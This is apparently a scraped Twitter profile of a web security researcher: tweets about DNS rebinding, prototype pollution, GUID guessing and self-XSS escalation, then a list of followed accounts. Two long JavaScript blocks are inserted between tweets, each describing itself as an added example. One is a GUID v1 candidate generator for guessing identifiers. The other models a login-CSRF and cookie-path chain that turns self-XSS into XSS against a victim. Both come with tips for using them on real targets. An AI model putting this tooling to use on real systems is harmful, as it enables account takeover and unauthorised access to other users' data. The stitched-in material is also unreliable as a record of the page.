Daniel Thatcher @_danielthatcher
Researcher, and security person at @intruder_io. Hack dumber. He/him | blog.long.lat | Joined June 2018
36 Tweets | 654 Followers | 257 Following | 129 Likes
And here’s part 2, presenting new techniques for reliable, split-second DNS rebinding in Chrome and Safari intruder.io/research/split…
Here's part 1, detailing how I hacked my company's own product using DNS rebinding: intruder.io/research/we-ha…
@sudhanshur705 @strellic This can work at times, and I mention something similar in the next part (coming soon), though in most of the real-world webapps I've seen driving headless browsers there is a timeout enforced by the app which you can't lengthen this way.
Excited to be talking about new DNS rebinding techniques at @BlackHatEvents #BHEU next week. The research for this talk will be released in 2 parts on the @intruder_io research blog - keep an eye out for part 1 on Thursday tinyurl.com/bdzxesd3
Part 2 will be released on Wednesday, when I'm presenting the research at BHEU
@BlackHatEvents @intruder_io I've been asked to hold off on the release of the first part until tomorrow, so sorry for the false alarm!
@BlackHatEvents Whenever I try to submit my proposal, I get a 403 Forbidden. Is there anything I can do?
A while ago I decided to try to take on a big challenge and work out how to detect prototype pollution black-box. One thing I'm very happy with from this research is the simplicity of the solution I found
Prototype pollution can be a dangerous bug, but it's hard to detect in real-world scenarios without the source code. In the latest blog, our researcher, @_danielthatcher, discusses a new technique for detecting prototype pollution in black-box situations: hubs.li/Q01Cs9L70
Why do I know so many Dan's in infosec? Is there something about the name Dan? I strongly advise being cautious of your data around anyone named Dan, until we work this out.
@PortSwiggerRes Thanks for sharing
The technique isn’t new, but the vast majority of pentesters I’ve spoken to don’t know about it, so I thought it worth sharing with an example from a pentest. I’ve also created a tool to help you exploit this issue github.com/intruder-io/gu…
As a newbie pentester I read the RFC for GUIDs out of a fear that I wasn’t testing them correctly. A few years later, it paid off.
GUIDs are everywhere - but there are hidden dangers when using them as they're designed for their uniqueness, not their security. Find out more in the latest blog from our research team: hubs.li/Q01pyz_r0 #guid #vulnerabilityscanning #CyberSecMonth
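The "uniqueness, not security" point above comes down to the RFC 4122 layout of a version-1 GUID: a 60-bit timestamp in 100 ns ticks since 1582-10-15, a 14-bit clock sequence, and a 48-bit node that is normally the generating host's MAC address. The block below is an added example, not the tweet's tool or any code from the linked posts: it parses a v1 GUID into those fields, rebuilds one from them, and enumerates the candidates an attacker would try around a known GUID from the same host. The sample GUID is the one RFC 4122 uses in its URN example; the window sizes are arbitrary.

```javascript
// Added example (not code from the tweet or the linked tool). Parses a
// version-1 GUID per RFC 4122 section 4.2, rebuilds one, and enumerates
// nearby candidates with the same node and clock sequence.

// 100 ns ticks between the v1 epoch (1582-10-15) and the Unix epoch (1970-01-01).
const GREGORIAN_TO_UNIX_TICKS = 122192928000000000n;

function parseGuidV1(guid) {
  const hex = guid.replace(/[{}-]/g, "").toLowerCase();
  if (!/^[0-9a-f]{32}$/.test(hex)) throw new Error("not a GUID: " + guid);
  const version = parseInt(hex[12], 16);
  if (version !== 1) throw new Error(`version ${version} GUID; only v1 carries a timestamp`);
  // Layout: time_low(8) time_mid(4) version(1)+time_hi(3) clock_seq(4) node(12)
  const ticks = BigInt("0x" + hex.slice(13, 16) + hex.slice(8, 12) + hex.slice(0, 8));
  const clockSeq = parseInt(hex.slice(16, 20), 16) & 0x3fff; // drop the 2 variant bits
  const nodeHex = hex.slice(20, 32);
  const unixMs = Number((ticks - GREGORIAN_TO_UNIX_TICKS) / 10000n);
  return {
    ticks,
    clockSeq,
    nodeHex,
    node: nodeHex.match(/../g).join(":"),
    // Multicast bit set means a random node was used instead of a MAC (section 4.5).
    randomNode: (parseInt(hex.slice(20, 22), 16) & 0x01) === 1,
    time: new Date(unixMs),
  };
}

function buildGuidV1(ticks, clockSeq, nodeHex) {
  const t = ticks.toString(16).padStart(15, "0");
  const cs = (0x8000 | (clockSeq & 0x3fff)).toString(16).padStart(4, "0"); // RFC variant 10xx
  return `${t.slice(7, 15)}-${t.slice(3, 7)}-1${t.slice(0, 3)}-${cs}-${nodeHex}`;
}

// Candidates with the same node and clock sequence, from `before` ticks earlier
// to `after` ticks later than the known GUID, every `step` ticks. 10,000 ticks
// are one millisecond, so size the window to the target's timestamp precision
// and to the number of requests you can afford.
function candidatesAround(knownGuid, before, after, step = 1n) {
  const { ticks, clockSeq, nodeHex } = parseGuidV1(knownGuid);
  const out = [];
  for (let t = ticks - before; t <= ticks + after; t += step) {
    out.push(buildGuidV1(t, clockSeq, nodeHex));
  }
  return out;
}

const SAMPLE = "f81d4fae-7dec-11d0-a765-00a0c91e6bf6"; // example GUID from RFC 4122
const parsed = parseGuidV1(SAMPLE);
console.log(parsed.time.toISOString(), parsed.node, parsed.clockSeq);
console.log(candidatesAround(SAMPLE, 2n, 2n));
```

Two caveats when using this against a real target: the clock sequence changes whenever the generator's clock is set backwards or its state is lost (a reboot, for instance), so a GUID observed long before the one you want may carry a different clock sequence than the one you need to search with; and none of this applies to version-4 GUIDs, which are random apart from the version and variant bits.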
I was lucky enough to catch this talk at BH, and it was one of the highlights of the conference for me. Great research, and really well presented
Just finished ElectroVolt talk at #DEFCON30. Was super glad to see the entire room full. Thanks a lot for coming AND supporting! ⚡️ Hope you enjoyed the talk and can use the knowledge in your day to day work. Feel free to check out electrovolt.io for POCs. #DC
@notdurson Dan is also a wonderful person. It was a lot of fun. Hopefully we see each other again next year
Heading off to Vegas for the first time. If you see me about, say hi. I’m the lanky blond British guy with round black glasses.
@notdurson @BlackHatEvents Sounds good. I’ll message you
If you only need to read info rather than modify it, then the trick of loading the application in two separate iFrames works well. @iamnoooob writes about it here: blog.noob.ninja/escalating-low… @avlidienbrunn has a great talk on this and other tricks: youtube.com/watch?v=l3yThC…
This example works by using the self-XSS to set a session cookie with a limited path so that the self-XSS will still load when the victim logs back into their account. The self-XSS can then access the rest of the application as the victim, so is effectively regular XSS.
If you have stored self-XSS and login CSRF you can probably do something interesting, but you have to do slightly more than this tip says. Here's an example I put together against Moodle a few years ago: blog.long.lat/2019/04/09/obt…
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇
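The path-scoped cookie trick in the replies above relies on two pieces of RFC 6265 behaviour: a cookie is only sent when its Path path-matches the request path, and when several cookies match, the ones with longer Paths are listed first in the Cookie header. Most server stacks take the first value for a repeated name, so a session cookie pinned to the attacker's profile path shadows the victim's site-wide session on that one path and nowhere else. The block below is an added model of that chain, not code from the thread or from the linked Moodle write-up; the app paths, the session tokens and the "browser" and "server" are all constructed for the demonstration, and nothing touches a network.

```javascript
// Added example (not code from the thread). Models the cookie-path trick:
// stored self-XSS + login CSRF becomes XSS against the victim.

const ATTACKER_PROFILE = "/profile/attacker"; // page holding the stored self-XSS (assumed path)
const SESSIONS = { sessA: "attacker", sessV: "victim" }; // constructed token -> user map

// RFC 6265 section 5.1.4 path-match.
function pathMatches(cookiePath, requestPath) {
  if (cookiePath === requestPath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith("/") || requestPath[cookiePath.length] === "/";
}

// Browser side: the jar is keyed on (name, path). A Set-Cookie replaces only a
// cookie with the same name AND path, which is why the path-scoped cookie
// survives the victim logging in again.
function setCookie(jar, name, value, path) {
  const kept = jar.filter((c) => !(c.name === name && c.path === path));
  return [...kept, { name, value, path }];
}

// Cookie header for a request: matching cookies, longest path first (section 5.4).
function cookieHeader(jar, requestPath) {
  return jar
    .filter((c) => pathMatches(c.path, requestPath))
    .sort((a, b) => b.path.length - a.path.length)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Server side: resolve the user from the Cookie header; the first "session" wins.
function userFor(jar, requestPath) {
  for (const pair of cookieHeader(jar, requestPath).split("; ")) {
    const [name, value] = pair.split("=");
    if (name === "session") return SESSIONS[value] ?? null;
  }
  return null;
}

// The chain described in the thread, step by step.
function runScenario() {
  let jar = [];

  // 1. Login CSRF: the victim's browser is now logged into the attacker's account.
  jar = setCookie(jar, "session", "sessA", "/");

  // 2. The victim views the attacker's profile. The stored self-XSS runs as the
  //    attacker and pins the attacker's session cookie to that one path.
  const xssRunsAtStep2 = userFor(jar, ATTACKER_PROFILE) === "attacker";
  jar = setCookie(jar, "session", "sessA", ATTACKER_PROFILE);

  // 3. The victim logs back into their own account. "Set-Cookie: session=sessV; Path=/"
  //    replaces the site-wide cookie but leaves the path-scoped one alone.
  jar = setCookie(jar, "session", "sessV", "/");

  // 4. The attacker's profile still resolves to the attacker, so the self-XSS
  //    loads again, while its same-origin fetch() calls to any other path carry
  //    only the victim's cookie and therefore run as the victim.
  return {
    xssRunsAtStep2,
    profileHeader: cookieHeader(jar, ATTACKER_PROFILE),
    profileUser: userFor(jar, ATTACKER_PROFILE),
    apiUser: userFor(jar, "/api/me"),
    settingsUser: userFor(jar, "/account/settings"),
  };
}

console.log(runScenario());
```

Two things to check before relying on this on a real target: that the server's cookie parser really does keep the first value for a repeated name (the model above assumes it), and that the session cookie is not a `__Host-` prefixed cookie, since browsers reject a `__Host-` cookie unless its Path is `/`, which removes the shadowing this chain depends on.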
James Kettle @albinowax
83K Followers 102 Following Director of Research at @PortSwigger aka @Burp_Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
Gareth Heyes @garethheyes
38K Followers 1K Following JavaScript for hackers: Learn to think like a hacker. https://t.co/e0aNEbEDk5
Hacking Articles @hackinarticles
297K Followers 477 Following House of Pentesters Join us: https://t.co/Y6XOlSOA92
sw33tLie @sw33tLie
10K Followers 946 Following Web application hacker, 25yo. Top 30 @ https://t.co/wX0yr85Tzk https://t.co/ZI7a8oJJcQ https://t.co/LGYK7tMOGo
harsh raj @harsh38raj
0 Followers 64 Following
Agentify @agentify_uy
102 Followers 60 Following Agentify AI - Agentes de Inteligencia Artificial para tu negocio.
Ali Shan @ali_shann__
0 Followers 140 Following Student of Computer Science || Vulnerability researcher
to^ @nguyendt016
149 Followers 211 Following Security Engineer at @calif_io | CTF player in @r3kapig
Sean @SeanSneakly
0 Followers 50 Following
Balú @RaulPastor7
110 Followers 429 Following
0xadt204 @0xadt204
3 Followers 475 Following
Mr. @al1k0k
68 Followers 2K Following
saifuddine @saifuddineX
129 Followers 571 Following Site Reliability Engineer "SRE" at a smart office furniture company | MIS Student | Bug Bounty Hunter | Tech Enthusiast | مصري | مسلم ـــــــ تحيا مصر 🇪🇬
N𝔸𝕍ⒺεŇ @Asympt0t3
78 Followers 2K Following 73 110 102 111 115 101 99 32 71 117 121 | 𝕋𝕙𝕖 ℂ𝕦𝕣𝕖 𝕗𝕠𝕣 𝔹𝕠𝕣𝕖𝕕𝕠𝕞 𝕀𝕤 ℂ𝕦𝕣𝕚𝕠𝕤𝕚𝕥𝕪. 𝕋𝕙𝕖𝕣𝕖 𝕀𝕤 ℕ𝕠 ℂ𝕦𝕣𝕖 𝕗𝕠𝕣 ℂ𝕦𝕣𝕚𝕠𝕤𝕚𝕥𝕪.🙂
Hadid @hadid028
0 Followers 128 Following
quanauq_ @quanauq_
0 Followers 187 Following
9MF @n1neMF
81 Followers 5K Following
AbuMuslim (أبومُ... @m19o__
10K Followers 3K Following Security Philosopher, Organizer @BSides_ABQ, Board Member @OWASPEgypt. R&D @aivillage_dc. YT @CyberDose_ Coffee++
Dijkstra Hoare @dijkstrasghosty
9 Followers 2K Following A Wannabe 🦀er | “Uncompromising safety isn't a limitation; it's the genesis of true freedom in complexity.” - Some Rust Bro Somewhere
N_1 @dd404x
14 Followers 234 Following
silentwarrior60 @silentwarrior60
116 Followers 6K Following
Ismail Arabi @IsmailArabi18
73 Followers 2K Following
@0xocdsec
4K Followers 8K Following 🏴☠️ 🇪🇺 💚 🇺🇦 | computers & features | 💚 🏴☠️ party | 603,628 km² https://t.co/F5dgX7AEoL
usama1912 @usama1912
0 Followers 190 Following
Vaisov Bek @vaisovbek
814 Followers 7K Following Security Researcher aka Bug Bounty Hunter | CTF Player
Mahmoud Ashraf @Mhmud_Ashraf
3 Followers 77 Following
Johnny @Luckyrocky2028
249 Followers 7K Following Stay Hungry, Stay Foolish. Only those who are self-disciplined can attain true freedom.|No Politics.
Austin Born @austinbuilds
178 Followers 367 Following Lead AI Engineer @actual_ai_ | Founder @shinzolabs
Intigriti @intigriti
209K Followers 666 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Ben Sadeghipour @NahamSec
247K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Sam Curry @samwcyo
101K Followers 1K Following
shubs @infosec_au
58K Followers 2K Following Co-founder, security researcher. Building an attack surface management platform, @assetnote
PortSwigger Research @PortSwiggerRes
120K Followers 7 Following Web security research from the team at @PortSwigger
Bug Bounty Reports Ex... @gregxsunday
54K Followers 613 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
Katie Paxton-Fear @InsiderPhD
97K Followers 2K Following Dr, apparently. Security Advocate @semgrep & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/her
Nate @nnwakelam
43K Followers 1K Following
JS0N Haddix @Jhaddix
176K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
Nicolas Grégoire @Agarri_FR
28K Followers 628 Following Web hacker and Burp Suite Pro trainer Refer to https://t.co/D5tRH7U2hg for trainings Follow @MasteringBurp for free tips and tricks
Julien | MrTuxracer @MrTuxracer
39K Followers 443 Following Founder of @rcesecurity | #BugBounty | @Hacker0x01 MVH && H1-Elite | $1,5+ Mio in Bounties | Mobile Hacker | @[email protected]
STÖK ✌️ @stokfredrik
138K Followers 1K Following Hi, I'm that hacker/creative that your friends told you about.
bugcrowd @Bugcrowd
199K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
Yassine Aboukir 🐐 @Yassineaboukir
33K Followers 411 Following HackerOne Top 40, Elite, Pentest Lead, Ambassador, x2 MVH Title, $1 million bounties and ex- Hacker Advisory Board • Digital Nomad/Hybrid Athlete/Surfer
zseano @zseano
81K Followers 713 Following #1 Amazon Hacker on a break from hacking. busy rebuilding bugbountyhunter and making bug bounties a better place for hackers
Soroush Dalili @irsdl
20K Followers 940 Following Hacker (ethical), web appsec specialist, trainer, tools builder & apps breaker 🕸️https://t.co/YipuTcYnWc🥷 🍏A dad-joke maker🍐
Luke Stephens (hakluk... @hakluke
100K Followers 2K Following Hacker, marketer. I manage socials and marketing for cybersecurity orgs. Founder of @hacker_content and @haksecio
Soren Iverson @soren_iverson
290K Followers 128 Following Idea guy. Building @iverson and @stompersapp
Timo Lo(n)gin @timolongin
380 Followers 34 Following Currently pwning elderly Internet protocols Mastodon: @[email protected]
Sebas @0xroot
4K Followers 466 Following - 🦊 Senior Security Consultant at @BishopFox - 📚 Curated Security Pills Newsletter https://t.co/c1XhZLXTZS
Ishai Shotten @popcornic
62 Followers 1K Following It's good to be the best, it's best to be the first
Azeria @Fox0x01
121K Followers 618 Following Sneaky bit flipper | CEO @azeria_labs | Author of “Arm Assembly Internals & RE” @BlueFoxBook | Adjunct Professor @SAISHopkins | Forbes 30u30
Eduardo Vela @sirdarckcat
13K Followers 614 Following not mad. mentally divergent. personal profile, opinions my own. everything I say is probably wrong. @Google
daniel:// stenberg:// @bagder
58K Followers 525 Following Typos and segfaults. I write curl. On team @wolfSSL. I don't know anything. @[email protected] My weekly email: https://t.co/9UYYYMLWaw
404 Media @404mediaco
37K Followers 13 Following a journalist-founded tech outlet here to fuck up the internet.
arxenix @ankursundara
1K Followers 712 Following i like web & browser bugs | ctf w/ @dicegangctf @ProjectSEKAIctf | security consultant @LeviathanSec | he/him
ProjectDiscovery @pdiscoveryio
42K Followers 144 Following Real, exploitable vulnerabilities. No noise. Nuclei scans fast. Neo closes the loop. @pdnuclei × @neo_ai_engineer
chompie @chompie1337
89K Followers 1K Following hacker, exploit developer/weird machine mechanic head of X-Force Offensive Research (XOR) @IBM
Agustín @acangiani
235 Followers 3K Following
Ben @fullstackpotato
60 Followers 749 Following A full stack potato that tries to do some security. @[email protected]
Ben Cox (EOL @benjojo... @Benjojo12
9K Followers 249 Following Hope you never notice the outages I cause. Knows where the RFC2616 bodies are buried. @recursecenter SP'2 18 Also @[email protected]
Daniel Cuthbert @dcuthbert
33K Followers 2K Following Documentary photographer, old creaky hacker. Co-author of @OWASP ASVS standard. Blackhat/Brucon Review Board & Co_chair UK Gov Cyber Security Advisory Board
Samuel Pritchard @samrpritchard
80 Followers 172 Following
Rogues Village @RoguesVillage
2K Followers 41 Following Rogues Village hosts talks and workshops looking at security questions through non-traditional lenses.
Aaditya Purani @aaditya_purani
7K Followers 916 Following Sr. SecEng @awscloud - Security Lead for Bedrock/Mantle. CTFs with @pb_ctf. DEFCON & BHUSA speaker. My opinions are my own. Ex-@Tesla @bishopfox @PaloAltoNtwks
Rachel Tobac @RachelTobac
112K Followers 8K Following Friendly Hacker & CEO @SocialProofSec security awareness/social engineering prevention Training, Videos, Talks | 3X @DEFCON🥈| Ex CISA gov Tech Advisory Council
Whiskey Pirate Crew @WhiskeyHackers
6K Followers 49 Following Hackers, Enthusiasts, Pirates. We are not “badgelife.” Always uncensored. All cool people welcome.
rxgamble @rxgamble
9K Followers 987 Following Gina Fiore. Gambler, writer. I wrote a book about my life and beating silly casino games. ADVANTAGE PLAYER 10.27.26 📕 ♣️ 🇵🇸
Quantum Village @quantum_village
1K Followers 104 Following Come engage, explore, and discuss the future quantum technologies! Discord: https://t.co/6gp2BcgIxK
Skytalks @dcskytalks
7K Followers 147 Following A ‘sub-conference’ that gives a unique platform for researchers to share their research, for angry hackers to rant about issues in the industry off-the-record
Jeff Moss @thedarktangent
104K Followers 8 Following https://t.co/fgXNGNt7gm Abandoned this site in 2022 but hopeful for the future of social media. Consider migrating to Mastodon DEFCON.socal
Kim Zetter @KimZetter
94K Followers 3K Following Journalist - cyber/national security. Author - COUNTDOWN TO ZERO DAY: Stuxnet and the Launch of the World's First Digital Weapon. https://t.co/334DzfSL1f
Ivan Fratric 💙💛 @ifsecure
19K Followers 209 Following Tech lead and security researcher at Google Project Zero. Author: Jackalope, TinyInst, WinAFL, Domato. PhD. Tweets are my own. Backup @[email protected]
sm0hk @sm0hk_713
4 Followers 47 Following
Vic: UK Edition @VicHarkness
2K Followers 724 Following I like birds, photography, and tech. @BSidesBSK organiser, @DefConScavHunt judge. @vicsfolklore alt. Occasional 🇺🇦 supply runner. Mainly shitposts. She/her
Curt @CurtBarnard
439 Followers 495 Following Sometimes I talk about computers. https://t.co/lQqeEELwk9
mopman @mopman
621 Followers 1K Following chaotic good hacker of computers who adheres to the common stereotypes of people who are hackers of computers. Once-MD of ; DROP TABLE "Companies"; Ltd
sysengineer @_sysengineer
28K Followers 959 Following I do not give Facebook permission to print anything off my computer
Not on here anymore, ... @malwaretech
30K Followers 2 Following No longer using Twitter. Check out https://t.co/BYnF2Aml7H for where to find me.
Internal Tech Emails @TechEmails
595K Followers 889 Following Internal tech industry emails that surface in public records. 🔍
🏳️⚧️Graph... @GraphCrimes
101K Followers 634 Following Graph High Crimes & Misdemeanors | I barely stick to gimmick be warned | She/her
TryHackMe @tryhackme
305K Followers 83 Following An online platform that makes it easy to break into and upskill in cyber security, all through your browser.
Hack The Box @hackthebox_eu
246K Followers 228 Following Cyber Mastery: Community Inspired. Enterprise Trusted.
Madhu Akula @madhuakula
4K Followers 1K Following Pragmatic Security Leader | Startup Advisor, Author, Speaker & Trainer @ BlackHat, DEFCON, USENIX, OWASP, SANS #Security, #CloudNative, #Kubernetes, #OpenSource
Ray [REDACTED] @RayRedacted
61K Followers 8K Following Hacker, Researcher, Podcast Producer (Tribe of Hackers, Darknet Diaries). Proud dad of the fastest climber in the world. Ever. “Ut scandis, alios subleva”
gafnit @gafnitav
1K Followers 60 Following
Andy Hornegold @AndyHornegold
32 Followers 461 Following Product Lead @intruder_io 🚀. Rooted in Red Teaming. Fascinated by elegance in code, infrastructure and 🏍️ . Go Fast. Opinions are my own.
Kuba Gretzky @mrgretzky
17K Followers 754 Following Creator of Evilginx - Reverse Proxy Phishing Framework for Red Teams: https://t.co/hPg644CTnM